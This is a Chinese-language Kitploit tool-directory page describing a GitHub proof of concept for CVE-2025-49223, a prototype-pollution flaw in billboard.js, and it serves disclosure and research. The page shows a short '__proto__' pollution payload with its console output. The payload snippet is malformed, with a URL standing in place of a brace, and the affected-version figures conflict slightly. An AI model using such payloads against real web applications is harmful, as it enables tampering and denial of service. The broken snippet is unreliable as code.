Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-49223-BillboardJS-PoC — CVE-2025-49223 的概念验证,演示了 billboard.js 中通过 generate 函数实现的原型污染,可导致任意代码执行或拒绝服务。 | Kitploit
工具/GitHubGitHub/louay-075/cve-2025-49223-billboardjs-poc
漏洞分析漏洞利用Web安全论文与研究学习与教育
GitHublouay-075/cve-2025-49223-billboardjs-poc

CVE-2025-49223-BillboardJS-PoC

CVE-2025-49223 的概念验证,演示了 billboard.js 中通过 generate 函数实现的原型污染,可导致任意代码执行或拒绝服务。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1141年前尚未审核
分享

💥 CVE-2025-49223 - Billboard.js 中的原型污染

已发现 billboard.js 3.15.1 之前的版本通过 generate 函数包含原型污染,这可能允许攻击者通过注入任意属性来执行任意代码或导致拒绝服务(DoS)。

本仓库演示了在 billboard.js 3.15.1 之前版本中发现的原型污染漏洞,该漏洞已披露为 CVE-2025-49223。


📌 摘要

  • 漏洞类型:原型污染
  • 受影响库:billboard.js
  • 受影响版本:<= 3.14.0
  • 修复版本:>= 3.15.1
  • CVE 编号:CVE-2025-49223
  • 影响:执行任意代码或导致拒绝服务

🧪 概念验证(PoC)

在浏览器中打开 index.html 并查看控制台日志中的原型污染尝试。

加载易受攻击的版本:

<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>

污染尝试:

{
  ["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/main/%7B
    polluted: "polluted_via_string_key"
  }
}

控制台输出:

🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key

这证实了攻击者可以污染 Object.prototype,从而影响页面上随后创建的任何对象。


🔥 影响

成功利用可能导致:

  • 向所有对象注入任意键
  • 篡改图表渲染逻辑
  • 应用程序崩溃(DoS)
  • 在依赖不安全对象合并的应用程序中可能存在安全绕过风险


🛡️ 缓解措施

  • ✅ 升级到 billboard.js 版本 3.15.1 或更高版本

🧱 参考

  • 🔗 NVD 上的 CVE-2025-49223
  • 🔗 Billboard.js 3.15.1 发布说明


⚠️ 免责声明: 此 PoC 仅用于教育和研究目的。请负责任地使用。

下载工具